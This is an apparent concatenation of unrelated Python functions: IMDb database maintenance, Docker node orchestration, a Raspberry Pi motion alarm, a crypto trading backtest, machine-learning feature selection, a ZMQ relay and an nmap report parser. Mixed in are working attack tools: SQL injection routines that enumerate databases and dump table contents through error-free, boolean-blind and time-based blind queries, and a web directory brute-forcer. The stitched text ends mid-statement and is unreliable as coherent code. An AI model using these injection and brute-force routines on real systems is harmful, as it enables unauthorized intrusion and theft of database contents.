def get_content_count(self, database_name, table_name): # 开始注内容 logger.debug("Start sqli table %s content amount..." % table_name) logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) # 注数据的数量 content_count = normal_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("Content account sqli success...The count is %d..." % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = build_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug("Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start table's %s content amount sqli..." % table_name) retVal = time_injection(select="count(*)", source=database_name + "." + table_name, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_count = int(retVal) logger.debug("Content account sqli success...The content_count is %d..." % content_count) logger.info("[*] content_count: %d" % content_count) # 把content account return回去 logger.info("[*] content count: %d" % content_count) return content_count
def export2lmdb(self, lmdb_host, lmdb_dbname): """ 匯出IMDB資料庫的資料到LMDB :param lmdb_host: :param lmdb_dbname: :return: """ logger.info('export to lmdb') since = 0 i = 0 while True: movies = self.DbOperator.get_movies_to_export_lmdb(since, limit=self.DbOperator.LIMIT) if movies: for movie in movies: movieid = movie[0] imdbid = 'tt%07d' % int(movie[1]) i += 1 try: imdbmovie = self.IMDbObj.get_movie(imdbid, movieid) imdbmovie.save2db(lmdb_host, lmdb_dbname) logger.info( '%d, %s, %s, %s, %s' % (i, movieid, imdbid, imdbmovie['url'], imdbmovie['posterurl']) ) except Exception as e: logger.error('save db error: %s \r\n %s' % (imdbid, str(e))) since += self.DbOperator.LIMIT else: break
def bootstrap(self): self.update_nodes() _updated = False for name, node in self.nodes.items(): try: node.connect() except: pass if not node.exists or not node.name: L.info("Node not found, creating a new node") self.create_node(name, self.cfg) # Unset it so we really refresh it _updated = True node.cleanup_dead() L.ok("Node %s alive and ready!"%name) if _updated: self.update_nodes() played = [] for s in self.base_services: played += self.play_service(self.nodes, s) if played: L.ok("Base services setup, cooling down while everything starts...") time.sleep(30) for s in self.dj_services + self.user_services: self.play_service(self.nodes, s) L.ok("Node setup OK!") return True
def kill_containers(context): cfg = context.obj for manager in cfg['managers']: mgr = cfg['project'].manager_for(manager) for name, node in mgr.nodes.items(): L.info('Stopping %d containers on node %s'%(len(node.containers), name)) node.stop_container()
def download_listfile(self): """ 下載IMDB的資料庫文字檔,http://www.imdb.com/interfaces :return: """ logger.info('download listfile') self.Downloader.download() logger.info('download listfile is success!')
def kill_services(context): cfg = context.obj for manager in cfg['managers']: mgr = cfg['project'].manager_for(manager) for s_name in mgr.user_services: for name, node in mgr.nodes.items(): containers = node.running_services.get(s_name, []) L.info('Stopping %d containers running %s on node %s'% (len(containers), s_name, name)) for container in containers: node.stop_container(id=container)
def setDetection(new): if re.search("true", str(new)): status = True logger.info("DETECTION!") elif re.search("false", str(new)): status = False logger.info("DETECTION!") else: logger.warn("Invalid status %s for DETECTION" %(new)) return global DETECTION DETECTION = status
def play_service(self, nodes, name): service = self.services[name] schedules = service.schedule(nodes) if len(schedules): L.info("Starting service %s %s times on %d nodes"%( name, len(schedules), len(nodes))) for node, schedule in schedules: self.play_by_schedule(node, schedule) L.ok("Service %s started OK"%name) else: L.ok("Service %s was running OK"%name) return schedules
def setActive(new): #if(newStatus is False or newStatus is "False" or newStatus is "false" or newStatus is 0 or newStatus is "0"): if re.search("false", str(new)): status = False logger.info("Alarm deactivated") #elif(newStatus is True or newStatus is "True" or newStatus is "true" or newStatus is 1 or newStatus is "1"): elif re.search("true", str(new)): status = True logger.info("Alarm activated") else: logger.warn("Invalid status %s" %(new)) return global active active = status
def dir_bruter(word_queue, target_url, stime, extensions=None, pbar=None): while not word_queue.empty(): pbar.update(1) attempt = word_queue.get() attempt_list = [] # 检查是否有文件扩展名,如果没有就是我们要暴力破解的路径 # if "." not in attempt: # attempt_list.append("%s/" % attempt) # else: attempt_list.append("%s" % attempt) # 如果我们想暴力扩展 if extensions: for extension in extensions: if extension == ".swp": attempt_list.append("/.%s%s" % (attempt.strip('/'), extension)) else: attempt_list.append("%s%s" % (attempt, extension)) # 迭代我们想要尝试的文件列表 for brute in attempt_list: url = "%s%s" % (target_url, urllib.quote(brute)) # print url try: headers = {} headers["User-Agent"] = conf['ua'] r = urllib2.Request(url, headers=headers) # pbar.update(1) try: response = urllib2.urlopen(r, timeout=2) except: logger.error("Time out...") continue # 有可能卡死 # 请求完成后睡眠 time.sleep(stime) if response.code != 404: logger.info("Get !!!!" + url) tqdm.write("[%d] => %s" % (response.code, url)) except urllib2.URLError, e: if hasattr(e, 'code') and e.code != 404: tqdm.write("!!! %d => %s" % (e.code, url))
def backup(self, dbname): logger.info('backup db') self.backupdb(dbname) logger.info('backup db is success!') logger.info('test backup db file') sys.stdout.flush() self.test_backupfile(dbname) logger.info('test backupfile is success!') self.move_backupfile(dbname)
def serv_forever(sub_p, pub_p): context = zmq.Context() pub_s = context.socket(zmq.PUB) pub_s.bind('tcp://*:{PUB_PORT}'.format(PUB_PORT=pub_p)) sub_s = context.socket(zmq.SUB) sub_s.setsockopt(zmq.SUBSCRIBE, '') sub_s.bind('tcp://*:{SUB_PORT}'.format(SUB_PORT=sub_p)) poller.register(sub_s, zmq.POLLIN) socks = dict(poller.poll(360000)) while 1: if socks: for sock, event in socks.iteritems(): if sock is sub_s: frame = sub_s.recv_multipart() logger.info('MESSAGE:%s', frame) pub_s.send_multipart(frame)
def create_node(self, name, cfg=None, options=None): if not cfg: cfg = {} if not options: options = {} else: cfg.update(options) options['provider'] = cfg.get('provider', {'name': 'local'}) iaas = options['provider'].get('driver', 'virtualbox') services = options['services'] = options.get('services', []) L.info("Creating new machine %s on %s"%(name, iaas)) swarm = cfg.get('swarm-token', '') extra = ' '.join(options['provider'].get('extra', [])) if not len(self.running_nodes): swarm_extra = ' --swarm --swarm-master --swarm-discovery token://%s'%swarm else: swarm_extra = ' --swarm --swarm-discovery token://%s'%swarm command = "docker-machine create --driver %s %s %s"%( iaas, extra, name) output = call(command) L.ok("Done creating %s on %s!"%(name, iaas)) self.update_nodes()
def run(self, *args, **kwargs): build = kwargs.pop('build', None) image = kwargs.get('image', None) if build: L.info("Building image %s on node %s"%(image, self.name)) self.call_docker("build %s"%build) if image: tagged = ':' in image and image or '%s:latest'%image if not tagged in self.local_images(): L.info("Can't find image %s, attempting to pull..."%image) self.call_docker("pull %s"%image) elif ':' in image and image.endswith('latest'): L.info("Image %s tagged 'latest', updating..."%image) try: self.call_docker("pull %s"%image) except: pass kwargs['image'] = image command_line = 'docker %s run %s %s'%(self.node_connect_str, image, kwargs.get('command','') or '') L.v("Using docker-py API to create container, you can run this --") L.v(command_line) dns = kwargs.pop('dns', None) dns_search = kwargs.pop('dns_search', None) privileged = kwargs.pop('privileged', '') == 'ceph' and 'ceph/' in image container = self.client.create_container(*args, **kwargs) return self.client.start(container, dns=dns, privileged=privileged), container
def update_movie_imdbid(self): """ 更新IMDB資料庫電影的IMDBID 如果更新某部電影的IMDBID,出現錯誤連續達到10次,則不繼續嘗試更新IMDBID(可能會是網路等問題) :return: """ logger.info('update imdb_id field') count = 0 max_try = 10 while True: movies = self.DbOperator.get_null_imdbid_movies() if len(movies) == 0: break for movie in movies: try_times = 0 count += 1 try: logger.info('%s: %s' % (count, self.get_imdbid_result(movie[0]))) except Exception: try_times += 1 time.sleep(3) if try_times == max_try: logger.error(traceback.format_exc()) return logger.info('import db to table is success!')
def main(): # main # activate API if api.lunch(): logger.info("API started") else: logger.error("API failed start") GPIO.setmode(GPIO.BOARD) pir = 26 GPIO.setup(pir, GPIO.IN) logger.info("Application started") while True: while active.getActive(): if GPIO.input(pir): time.sleep(1) if GPIO.input(pir): active.setDetection("true") sender.emailAlert() active.setDetection("false") time.sleep(0.2)
def _update_imdb_movies(self, getdata_func): """ 更新imdb電影資訊 利用imdbpy去取得最新的電影資訊,然後更新資料庫 :param getdata_func: 取得要更新的imdb電影 :return: """ i = 0 since = 0 while True: movies = getdata_func(limit=self.DbOperator.LIMIT, since=since) if movies: for movie in movies: imdbid = movie[0] try: # 檢查是否正確的imdbid格式 if not re.match('tt\d{7}', imdbid): raise Exception('not a valid imdbid') if self.DbOperator.is_error_imdbid_movie(imdbid): logger.info('error imdbid: %s' % imdbid) continue imdbmovie = self.IMDbObj.get_movie(imdbid) imdbmovie.save2db(self.DbOperator.HOST, self.DbOperator.DB) i += 1 logger.info( (i, imdbid, imdbmovie['url'], imdbmovie['rating'], imdbmovie['posterurl']).__str__() ) except Exception as e: time.sleep(30) # 如果imdb網路正常,卻取不到資訊,代表可能是錯誤的imdbid,所以要清除imdbid if self.IMDbObj.is_network_ok(): self.DbOperator.clear_imdbid(imdbid) logger.info('clear imdbid: %s' % imdbid) else: logger.warning('update imdb fail: %s' % (str(e))) return since += self.DbOperator.LIMIT logger.info('exported count: %d' % i) else: break
def import_listfile(self): """ 將IMDB的資料庫文字檔匯進DB 如果匯入時發生問題,則利用上次的備份檔進行還原 :return: """ logger.info('import listfile to db') try: self.make_csvdir() imdbpy2sql_path = os.path.normpath('%s/updateimdb/bin/' % DIR_CRONTAB) cmd = 'python %s/imdbpy2sql.py -d %s -u %s -c %s -i table' \ % (imdbpy2sql_path, self.Downloader.get_download_dir_path(), self.DbOperator.URI, self.get_csvdir()) subprocess.check_call(cmd, shell=True) except Exception: logger.error('error occurred during import listfile to db, try to restore the older db') self.DbBackup.restoredb(self.DbOperator.DB, '%s/%s.bak' % (self.DbBackup.BACKUPDIR, self.DbOperator.DB)) logger.info('restore success!') raise logger.info('import listfile to db is success!')
def play_by_schedule(self, node, schedule): s = schedule ip = s['ip'] name = s['node'] role = s.get('role', None) number = s.get('number', None) s['leader_ip'] = self.leader_ip s['container_name'] = container_name = s.get('container_name', '%(service)s.%(node)s.%(domain)s')%(s) labels = {'service': s['service']} labels.update(s.get('labels',{})) ports = map(str, s.get('ports', [])) dynamic = map(str, s.get('dynamic_ports', [])) expose = [] bind = {} for p in ports: if '/' in p: p, proto = p.split('/') else: proto = 'tcp' if ':' in p: h_p, c_p = map(int, p.split(':')) else: h_p = c_p = int(p) if proto in ['tcp', 'both']: expose.append(c_p) bind[c_p] = (node.ip, h_p) if proto in ['udp', 'both']: expose.append( (c_p, 'udp') ) bind['%s/udp'%c_p] = (node.ip, h_p) L.info('Opening static port on %s:%s to %s'%(node.ip, h_p, c_p)) for p in dynamic: if '/' in p: p, proto = p.split('/') else: proto = 'tcp' c_p = int(p) if proto in ['tcp', 'both']: expose.append(c_p) bind[c_p] = (node.ip, ) if proto in ['udp', 'both']: expose.append( (c_p, 'udp') ) bind['%s/udp'%c_p] = (node.ip, ) L.info('Opening dynamic port on %s to %s'%(node.ip, c_p)) node.cleanup_dead(name=container_name) if not node.is_running(name=container_name): build = s.get('build', None) image = build and s.get('service', '') or s.get('image', None) instance = node.run( name=container_name, hostname=container_name, image=image, build=build, ports=expose, command=s.get('command', '')%s, environment=[e%s for e in s.get('environment', [])], labels=labels, host_config = node.client.create_host_config( binds=s.get('volumes', None), port_bindings=bind, dns=[self.leader_ip], dns_search=[self.cfg.get('domain', None)], network_mode=s.get('network', None), ) ) else: L.debug("Already running %s"%(container_name))
def trading_day(self, day): session = self.createSession() for symbol, strat in self.strategies.items(): try: signal = strat.get_signal(day) #ToDo: Handle exceptions except Exception as e: logger.debug("Exception for {} at day {}: {}".format(symbol, day, e)) continue session.add(signal) # Save signals to db for history # Get asset asset = self.exchange.get_or_create_asset(session, symbol) # Manage open positions longs = self.exchange.get_open_long(session, asset) for o in longs: if o.should_stop(signal.close): logger.info('[Day: {}] Closing long position {} on {} due to stop loss'.format(day, o.id, o.symbol)) _, log = self.exchange.close_order(day, asset, o, o.stop_loss) session.add(log) continue # If signal is SELL or position has a 1% profit if signal.signal == SignalType.SELL: logger.info( '[Day: {}] Closing long position {} on {} due to SELL signal'.format(day, o.id, o.symbol)) _, log = self.exchange.close_order(day, asset, o, signal.close) session.add(log) continue shorts = self.exchange.get_open_short(session, asset) for o in shorts: # If close meets stop loss, close position if o.should_stop(signal.close): logger.info( '[Day: {}] Closing short position {} on {} due to stop loss'.format(day, o.id, o.symbol)) _, log = self.exchange.close_order(day, asset, o, o.stop_loss) session.add(log) continue # If signal is BUY we're going to lose money, so we close position if signal.signal == SignalType.BUY: logger.info( '[Day: {}] Closing short position {} on {} due to BUY signal'.format(day, o.id, o.symbol)) _, log = self.exchange.close_order(day, asset, o, signal.close) session.add(log) continue # If signal is HOLD and position is old if o.get_age_in_days(day) > 2 and signal == SignalType.HOLD: logger.info('[Day: {}] Closing short position {} on {} due to age'.format(day, o.id, o.symbol)) _, log = self.exchange.close_order(day, asset, o, signal.close) session.add(log) continue ## Open new positions # Determine position sizing position_coins = asset.position_size(signal.close, self.order_size) # Open the order if signal.signal == SignalType.BUY: logger.info( '[Day: {}] Opening long position on {} due to BUY signal [Close {}, Price {}, Coins {}]'.format( day, symbol, signal.close, position_coins * signal.close, position_coins)) o, log = self.exchange.open_order(day, OrderType.LONG, asset, position_coins, signal.close, stop_loss=-0.01) # Stop loss is -1% if not o: logger.error("LONG FAILED") else: session.add(o) session.add(log) elif signal.signal == SignalType.SELL: logger.info( '[Day: {}] Opening short position on {} due to BUY signal [Close {}, Price {}, Coins {}]'.format( day, symbol, signal.close, position_coins * signal.close, position_coins)) o, log = self.exchange.open_order(day, OrderType.SHORT, asset, position_coins, signal.close, stop_loss=0.01) # Stop loss is +1% if not o: logger.error("SHORT FAILED") else: session.add(o) session.add(log) session.add(Equity( day=day, symbol=symbol, equity=asset.equity(signal.close), longs=asset.long_orders, shorts=asset.short_orders )) session.commit()
def build_model(dataset, pipeline, experiment, current_target='class', test_size=0.3): models_dir = './results/{}_{}_{}/models/'.format(dataset, pipeline, experiment) reports_dir = './results/{}_{}_{}/reports/'.format(dataset, pipeline, experiment) experiment_index_file = './results/{}_{}_{}/index.json'.format( dataset, pipeline, experiment) log_file = './results/{}_{}_{}/model_build.log'.format( dataset, pipeline, experiment) scoring = make_scorer(precision_score, zero_division=1, average='micro') os.makedirs(models_dir, exist_ok=True) os.makedirs(reports_dir, exist_ok=True) # Setup logging logger.setup(filename=log_file, filemode='w', root_level=logging.DEBUG, log_level=logging.DEBUG, logger='build_model') index_name = 'index' if '.' in dataset: splits = dataset.split(".") dataset = splits[0] index_name = splits[1] # Load the dataset index dataset_index = load_dataset(dataset, return_index=True, index_name=index_name) # Dynamically import the pipeline we want to use for building the model logger.info('Start experiment: {} using {} on {} with target {}'.format( experiment, pipeline, dataset, current_target)) reports = ReportCollection(dataset, pipeline, experiment) for _sym, data in {'BTC': dataset_index['BTC']}.items(): try: logger.info('Start processing: {}'.format(_sym)) features = pd.read_csv(data['csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) targets = pd.read_csv(data['target_csv'], sep=',', encoding='utf-8', index_col='Date', parse_dates=True) # Drop columns whose values are all NaN, as well as rows with ANY nan value, then # replace infinity values with nan so that they can later be imputed to a finite value features = features.dropna( axis='columns', how='all').dropna().replace([np.inf, -np.inf], np.nan) target = targets.loc[features.index][current_target] #X_train, X_test, y_train, y_test = train_test_split(features, target, shuffle=False, test_size=test_size) all_size = features.shape[0] train_size = int(all_size * (1 - test_size)) features = detabularise( features[[c for c in features.columns if 'close' in c]]) X_train = features.iloc[0:train_size] y_train = target.iloc[0:train_size] X_test = features.iloc[train_size:all_size] y_test = target.iloc[train_size:all_size] # Summarize distribution logger.info("Start Grid search") clf = ShapeletTransformClassifier(time_contract_in_mins=5) clf.fit(X_train, y_train) print('{} Score: {}'.format(_sym, clf.score(X_test, y_test))) pred = clf.predict(X_test) print(classification_report(y_test, pred)) logger.info("End Grid search") logger.info("--- {} end ---".format(_sym)) except Exception as e: logger.error( "Exception while building model pipeline: {} dataset: {} symbol: {}\nException:\n{}" .format(pipeline, dataset, _sym, e)) traceback.print_exc() return reports
def get_database(self): logger.debug("The sqlirequest is %s, start sqli databases..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start database amount sqli...") # 先注databases的数量 databases_number = normal_injection(select='COUNT(`SCHEMA_NAME`)', source='information_schema.SCHEMATA', dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number) print "[*] databases_number: %d" % databases_number # 每个循环跑一次databases的数据 for i in trange(int(databases_number), desc="Database sqli...", leave=False, disable=True): # 首先是database name的长度 logger.debug("Start %dth database length sqli..." % (i + 1)) databases_name_len = normal_injection(select='length(`SCHEMA_NAME`)', source='information_schema.SCHEMATA', limit=i, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest ) logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len)) logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len)) # 然后注database name logger.debug("Start %dth database name sqli..." % (i + 1)) databases_name = normal_injection(select='`SCHEMA_NAME`', source='information_schema.SCHEMATA', limit=i, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest ) logger.debug( "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name)) # 把databases_name 中不是information_schema插入列表 if databases_name != "information_schema": self.databases_name.append(databases_name) logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start database amount sqli...") retVal = build_injection(select="COUNT(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) databases_number = int(retVal) logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number) logger.info("[*] databases_number: %d" % databases_number) for i in range(0, int(databases_number)): logger.debug("Start %dth database length sqli..." % (i + 1)) # 然后注databases_name 的 length retVal = build_injection(select="length(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) databases_name_len = int(retVal) logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len)) logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len)) # 然后注databases名字 # 清空database_name databases_name = "" logger.debug("Start %dth database sqli..." % (i + 1)) for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False): retVal = build_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) databases_name += chr(retVal) logger.debug( "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name)) # 把databases_name 中不是information_schema插入列表 if databases_name != "information_schema": self.databases_name.append(databases_name) logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) logger.debug("Start database amount sqli...") retVal = time_injection(select="COUNT(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) databases_number = int(retVal) logger.debug("Databases amount sqli success...The databases_number is %d..." % databases_number) logger.info("[*] databases_number: %d" % databases_number) for i in range(0, int(databases_number)): logger.debug("Start %dth database length sqli..." % (i + 1)) # 然后注databases_name 的 length retVal = time_injection(select="length(`SCHEMA_NAME`)", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) databases_name_len = int(retVal) logger.debug("%dth Databases name length sqli success...The databases_name_len is %d..." % ((i + 1), databases_name_len)) logger.info("[*] %dth databases_name_len: %d" % ((i + 1), databases_name_len)) # 然后注databases名字 # 清空databases_name databases_name = "" logger.debug("Start %dth database sqli..." % (i + 1)) for j in trange(int(databases_name_len), desc='%dth Database sqli' % (i + 1), leave=False): retVal = time_injection(select="ascii(substring(`SCHEMA_NAME`," + repr(j + 1) + ",1))", source="information_schema.SCHEMATA", limit=i, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) databases_name += chr(retVal) logger.debug( "%dth Databases name sqli success...The databases_name is %s..." % ((i + 1), databases_name)) # 把databases_name 中不是information_schema插入列表 if databases_name != "information_schema": self.databases_name.append(databases_name) logger.info("[*] %dth databases_name: %s" % ((i + 1), databases_name)) databases_name = ','.join(self.databases_name) print "[*] databases_name list: " + databases_name
from threading import Thread from time import sleep from lib.log import logger logger.info("Loading library: {0}".format(__name__)) pins = {"1": 10, "2": 9, "3": 11, "4": 22} OUT = 1 IN = 2 interrupt = None def setup(gpio_pin, in_out): pass def output(gpio_pin, high_low): for v in pins: if pins[v] == gpio_pin: logger.debug("Relay[{0}] is {1}".format( v, "HIGH" if high_low else "LOW")) def main(): output(11, True) output(9, False) def add_interrupt_callback(gpio_pin, func, **kwargs): global interrupt
def run(self): # define this function,use for threading, define here or define in child-class both should be OK self.process() self.d = self.get_hostnames() self.e = self.get_emails() logger.info("{0} found {1} domain(s) and {2} email(s)".format(self.engine_name,len(self.d),len(self.e))) return self.d, self.e
def main(): result = {} for _sym in SYMBOLS: dataset = 'data/result/datasets/csv/{}.csv'.format(_sym) df = pd.read_csv(dataset, sep=',', encoding='utf-8', index_col='Date', parse_dates=True) df = df.replace([np.inf, -np.inf], np.nan).dropna() X = df[df.columns.difference(['target', 'target_pct', 'target_label'])] y = df['target'] #print("======"+_sym+"======") #print(X.info()) # Variance Threshold sel = VarianceThreshold() sel.fit_transform(X) sup = sel.get_support() X = X[[name for flag, name in zip(sup, X.columns) if flag]] ## SelectKBest sel = SelectKBest(chi2, k=30) sX = scale(X, scaler='minmax') sel.fit_transform(sX, y) sup = sel.get_support() sX = sX[[name for flag, name in zip(sup, sX.columns) if flag]] ## Recursive Feature Elimination # Create the RFE object and compute a cross-validated score. # The "accuracy" scoring is proportional to the number of correct # classifications # model = SVC(kernel="linear") # rfecv = RFECV(estimator=model, step=1, cv=StratifiedKFold(2), scoring='accuracy', n_jobs=-1, verbose=1) # rfecv.fit(X, y) # X = X[[name for flag, name in zip(rfecv.support_, X.columns) if flag]] ### Genetic # estimator = MLPClassifier(**{ # 'hidden_layer_sizes': (10, 4), # 'solver': 'lbfgs', # 'learning_rate': 'constant', # 'learning_rate_init': 0.001, # 'activation': 'logistic' # }) estimator = LogisticRegression(solver="liblinear", multi_class="ovr") gscv = GeneticSelectionCV(estimator, cv=2, verbose=1, scoring="accuracy", max_features=30, n_population=50, crossover_proba=0.5, mutation_proba=0.2, n_generations=80, crossover_independent_proba=0.5, mutation_independent_proba=0.05, tournament_size=3, n_gen_no_change=10, caching=True, n_jobs=-1) gscv = gscv.fit(X, y) X = X[[name for flag, name in zip(gscv.support_, X.columns) if flag]] #print(X.columns) # print("[%s] Optimal number of features : %d Set: %s" % (_sym, rfecv.n_features_, ', '.join(X.columns))) # plt.figure() # plt.title(_sym + ' SVC RFECV K=2') # plt.xlabel("Number of features selected") # plt.ylabel("Cross validation score (nb of correct classifications)") # plt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_) # plt.show() logger.info("{}: {}".format(_sym, X.columns)) result[_sym] = { 'dataset': dataset, 'columns_genetic_lr_30': [c for c in X.columns], 'columns_kbest_30': [c for c in sX.columns] } return result
# open final report file with open(csv_filename, 'w') as csvwrite: # set field names fieldnames = ['IP Address', 'Port/Protocol', 'Domains', 'Operating System', 'OS Version', 'Notes'] writer = csv.DictWriter(csvwrite, fieldnames=fieldnames, dialect=csv.excel, quoting=csv.QUOTE_ALL) # write CSV header writer.writeheader() # iterate through xml(s) for xml_report in nmap_xml_reports: try: # trying to load xml file nmap_report = NmapParser.parse_fromfile(xml_report) logger.info("%s host(s) loaded from %s" % (len(nmap_report.hosts), xml_report)) except Exception, e: logger.warn("XML file %s corrupted or format not recognized" % xml_report) # keep looking for others xml continue # start a cumulative dictionary results = nmap_combine(nmap_report, results) #print "results: %s" % len(results) logger.info("Wraping up results") for ip_address in results: # colecting info for each field open_ports = check_ports(results[ip_address]['Port/Protocol']) hostnames = list_to_str(results[ip_address]['Domains']) notes = results[ip_address]['Notes']
pub_s = context.socket(zmq.PUB) pub_s.bind('tcp://*:{PUB_PORT}'.format(PUB_PORT=pub_p)) sub_s = context.socket(zmq.SUB) sub_s.setsockopt(zmq.SUBSCRIBE, '') sub_s.bind('tcp://*:{SUB_PORT}'.format(SUB_PORT=sub_p)) poller.register(sub_s, zmq.POLLIN) socks = dict(poller.poll(360000)) while 1: if socks: for sock, event in socks.iteritems(): if sock is sub_s: frame = sub_s.recv_multipart() logger.info('MESSAGE:%s', frame) pub_s.send_multipart(frame) if __name__ == '__main__': sub_p = 9021 pub_p = 9022 opts, argvs = getopt.getopt(sys.argv[1:], "s:p:") for op, value in opts: if op == '-s': sub_p = int(value) if op == '-p': pub_p = int(value) logger.info('starting...') serv_forever(sub_p, pub_p)
def get_content(self, result, database_name, table_name, column_name, limits): # 开始注内容 content_len = 0 logger.debug("Start sqli table %s column %s limit %d content..." % (table_name, column_name, limits)) # 先GET if self.sqlirequest == "GET": logger.debug("The sqlirequest is %s, start sqli content..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 注这一条的数据长度 logger.debug("Start %dth content length sqli..." % (limits + 1)) content_len = normal_injection( select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content logger.debug("Start %dth content sqli..." % (limits + 1)) content = normal_injection(select=column_name, source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的 length retVal = build_injection(select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Content sqli' % (limits + 1), leave=False): retVal = build_injection( select="ascii(substring(" + column_name + "," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, lens=self.len, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "time": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的length retVal = time_injection(select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isCount=True, sqlirequest=self.sqlirequest) content_len = int(retVal) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content名字 # 清空column_name content = "" logger.debug("Start %dth content sqli..." % (limits + 1)) for j in trange(int(content_len), desc='%dth Database sqli' % (limits + 1), leave=False): retVal = time_injection( select="ascii(substring(" + column_name + "," + repr(j + 1) + ",1))", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, times=self.time, isStrings=True, sqlirequest=self.sqlirequest) content += chr(retVal) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) # 然后是post elif self.sqlirequest == "POST": logger.debug("The sqlirequest is %s, start sqli contents..." % self.sqlirequest) if self.sqlimethod == "normal": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 首先是tablename的长度 content_len = normal_injection( select="length(" + column_name + ")", source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isCount=True, sqlirequest=self.sqlirequest) logger.debug( "Content length sqli success...now is limit %d, The content_len is %d..." % (limits, content_len)) logger.info("[*] content_len: %d" % content_len) # 然后注content content = normal_injection(select=column_name, source=database_name + "." + table_name, limit=limits, dealpayload=self.dealpayload, data=self.Data, isStrings=True, sqlirequest=self.sqlirequest) logger.debug("Content sqli success...The content is %s..." % content) # 把content return回去,以元组的形式 contents = [column_name, content] logger.info("[*] content: %s" % content) result.put(tuple(contents)) elif self.sqlimethod == "build": logger.debug("The sqlimethod is %s..." % self.sqlimethod) # 然后注content 的length retVal = 